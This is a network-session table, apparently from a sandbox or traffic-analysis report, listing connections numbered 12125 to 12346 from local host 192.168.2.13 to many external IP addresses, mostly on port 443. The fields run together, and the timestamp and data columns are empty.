                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12125192.168.2.1356332178.0.45.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12126192.168.2.1359772195.43.225.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12127192.168.2.1357668131.236.203.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12128192.168.2.134680213.222.80.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12129192.168.2.135471293.135.16.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12130192.168.2.134846078.221.45.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12131192.168.2.1344584166.74.48.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12132192.168.2.135668824.13.35.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12133192.168.2.1352296148.126.29.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12134192.168.2.135430638.84.170.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12135192.168.2.1337730130.24.155.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12136192.168.2.1360342154.104.181.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12137192.168.2.134905676.73.220.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12138192.168.2.1343554219.210.35.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12139192.168.2.1356242175.216.199.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12140192.168.2.133315072.57.135.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12141192.168.2.1359262164.181.79.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12142192.168.2.133775297.219.188.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12143192.168.2.1353518106.247.244.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12144192.168.2.1349738121.76.230.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12145192.168.2.134768088.36.110.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12146192.168.2.135314692.234.81.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12147192.168.2.1343952183.119.169.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12148192.168.2.1348928182.139.189.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12149192.168.2.136048289.59.36.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12150192.168.2.135007699.247.30.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12151192.168.2.134279045.11.197.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12152192.168.2.1341276179.164.185.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12153192.168.2.1355518170.43.140.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12154192.168.2.1342982207.12.248.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12155192.168.2.1344968194.84.163.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12156192.168.2.133570440.236.164.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12157192.168.2.134789214.91.109.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12158192.168.2.135157095.95.125.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12159192.168.2.134669483.114.72.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12160192.168.2.135270824.18.4.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12161192.168.2.1347638196.168.52.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12162192.168.2.136086070.241.147.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12163192.168.2.1359174212.64.129.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12164192.168.2.134115657.105.205.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12165192.168.2.134963617.45.228.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12166192.168.2.135021477.22.91.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12167192.168.2.1353384143.188.38.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12168192.168.2.1355914186.186.200.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12169192.168.2.1360870104.243.211.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12170192.168.2.1355334118.51.208.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12171192.168.2.1336708170.5.202.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12172192.168.2.1359172182.33.111.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12173192.168.2.135075245.221.203.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12174192.168.2.1341466212.52.44.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12175192.168.2.135244613.217.249.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12176192.168.2.1345388156.197.133.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12177192.168.2.134871879.168.6.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12178192.168.2.1337152168.37.242.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12179192.168.2.133544887.113.212.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12180192.168.2.135760258.186.159.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12181192.168.2.136024631.7.93.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12182192.168.2.1336960103.36.218.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12183192.168.2.134292467.231.47.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12184192.168.2.1343276181.201.253.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12185192.168.2.135872288.212.42.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12186192.168.2.1343724141.162.237.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12187192.168.2.1334312156.165.253.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12188192.168.2.1338294154.82.51.2028080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12189192.168.2.134331468.68.45.318080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12190192.168.2.1342748143.83.92.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12191192.168.2.135328690.5.119.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12192192.168.2.1332964174.205.174.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12193192.168.2.1347256126.232.250.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12194192.168.2.1345368150.77.249.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12195192.168.2.134605658.17.17.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12196192.168.2.133572467.148.14.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12197192.168.2.13336021.45.226.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12198192.168.2.134776439.189.187.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12199192.168.2.1351426193.160.149.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12200192.168.2.13521649.171.169.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12201192.168.2.1349876187.231.227.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12202192.168.2.1335460205.201.12.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12203192.168.2.1337836203.194.138.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12204192.168.2.1341510194.19.165.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12205192.168.2.1344440115.71.182.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12206192.168.2.134441617.28.179.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12207192.168.2.1357888126.61.59.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12208192.168.2.134004818.181.73.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12209192.168.2.1338740151.170.94.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12210192.168.2.134173072.95.110.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12211192.168.2.1348842192.201.9.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12212192.168.2.1358176147.232.47.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12213192.168.2.133330066.58.146.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12214192.168.2.1340532154.147.4.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12215192.168.2.1343368152.107.168.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12216192.168.2.134815014.162.242.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12217192.168.2.135934065.47.197.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12218192.168.2.1344686171.197.89.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12219192.168.2.133436069.50.174.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12220192.168.2.1333586134.98.252.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12221192.168.2.1343480135.49.211.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12222192.168.2.1337852207.219.169.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12223192.168.2.1334576136.68.226.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12224192.168.2.1334590100.2.107.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12225192.168.2.135044818.5.255.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12226192.168.2.1353632209.112.56.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12227192.168.2.1349174212.69.11.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12228192.168.2.1340220116.203.214.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12229192.168.2.1347534103.165.133.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12230192.168.2.1358210196.252.155.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12231192.168.2.133941860.83.100.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12232192.168.2.1341794160.16.199.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12233192.168.2.133711853.61.120.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12234192.168.2.1340742107.8.247.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12235192.168.2.133942674.70.152.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12236192.168.2.13484445.197.196.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12237192.168.2.134525281.1.234.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12238192.168.2.1357022197.5.228.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12239192.168.2.1353208102.25.24.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12240192.168.2.1357522206.0.104.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12241192.168.2.133587292.238.190.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12242192.168.2.134725443.225.53.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12243192.168.2.136049679.33.39.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12244192.168.2.1355500170.179.208.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12245192.168.2.1342254117.53.33.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12246192.168.2.1344074192.15.9.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12247192.168.2.1348208142.132.47.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12248192.168.2.1343680122.246.66.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12249192.168.2.1355354209.85.135.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12250192.168.2.1348944141.120.73.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12251192.168.2.133496847.41.205.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12252192.168.2.1332944182.99.14.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12253192.168.2.13347624.38.3.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12254192.168.2.1351132122.220.15.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12255192.168.2.134665453.24.91.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12256192.168.2.134901674.254.46.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12257192.168.2.133700490.90.60.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12258192.168.2.1340370193.77.13.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12259192.168.2.134680067.77.145.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12260192.168.2.135793493.119.255.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12261192.168.2.1358770199.57.192.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12262192.168.2.1350114102.0.164.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12263192.168.2.1341476125.146.213.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12264192.168.2.134604462.195.209.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12265192.168.2.134864095.10.212.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12266192.168.2.1352270210.2.111.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12267192.168.2.1355764102.253.238.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12268192.168.2.1334890189.233.232.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12269192.168.2.1351444124.255.4.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12270192.168.2.1341892201.191.43.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12271192.168.2.1339904117.27.118.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12272192.168.2.1357002195.93.104.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12273192.168.2.1348076101.13.111.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12274192.168.2.1350920104.147.229.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12275192.168.2.1337534119.184.50.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12276192.168.2.1359600149.216.161.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12277192.168.2.1354812151.226.234.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12278192.168.2.1357920137.76.38.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12279192.168.2.135328042.46.245.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12280192.168.2.135281671.81.44.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12281192.168.2.135330237.117.35.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12282192.168.2.133500672.126.111.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12283192.168.2.1346752184.174.79.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12284192.168.2.1357442174.141.24.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12285192.168.2.1347002152.5.101.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12286192.168.2.133607462.234.177.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12287192.168.2.134321240.5.40.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12288192.168.2.1357080172.129.84.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12289192.168.2.133859414.81.38.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12290192.168.2.134884025.44.77.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12291192.168.2.134305269.64.210.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12292192.168.2.1345638190.177.117.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12293192.168.2.1348012149.48.232.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12294192.168.2.136064441.148.208.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12295192.168.2.1346738206.77.41.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12296192.168.2.135286614.252.95.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12297192.168.2.133686678.167.23.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12298192.168.2.1357530135.188.104.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12299192.168.2.135245866.37.69.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12300192.168.2.133551849.85.16.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12301192.168.2.1345186140.159.49.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12302192.168.2.133459289.116.144.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12303192.168.2.133910687.203.186.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12304192.168.2.1360694196.82.249.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12305192.168.2.135994212.25.118.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12306192.168.2.133811819.150.63.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12307192.168.2.1347242204.110.53.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12308192.168.2.1333218151.38.243.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12309192.168.2.1343876101.31.210.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12310192.168.2.1342116104.27.125.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12311192.168.2.1346056123.121.111.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12312192.168.2.1356078173.3.148.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12313192.168.2.134363058.114.135.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12314192.168.2.133992070.187.171.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12315192.168.2.133650677.235.37.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12316192.168.2.1337388114.203.161.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12317192.168.2.135745436.212.108.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12318192.168.2.1344246204.67.81.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12319192.168.2.1340446100.139.242.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12320192.168.2.135858452.90.199.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12321192.168.2.135756470.172.208.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12322192.168.2.134605057.216.110.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12323192.168.2.1342314218.18.239.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12324192.168.2.1338300212.16.56.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12325192.168.2.133621878.83.28.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12326192.168.2.134241660.119.162.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12327192.168.2.13413388.40.100.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12328192.168.2.1350604165.66.217.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12329192.168.2.1352826113.227.105.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12330192.168.2.1343284120.223.100.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12331192.168.2.1359132140.230.237.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12332192.168.2.1357706222.187.179.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12333192.168.2.1335602129.119.170.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12334192.168.2.133800239.210.171.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12335192.168.2.1358954137.234.240.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12336192.168.2.135291685.252.69.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12337192.168.2.1340768159.124.61.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12338192.168.2.1351634151.131.194.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12339192.168.2.1358490140.173.187.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12340192.168.2.134041661.201.69.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12341192.168.2.134943025.88.128.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12342192.168.2.1335868111.10.42.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12343192.168.2.1352096158.132.24.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12344192.168.2.133289613.197.170.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12345192.168.2.1340354156.65.12.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    12346192.168.2.1344720120.102.237.169443
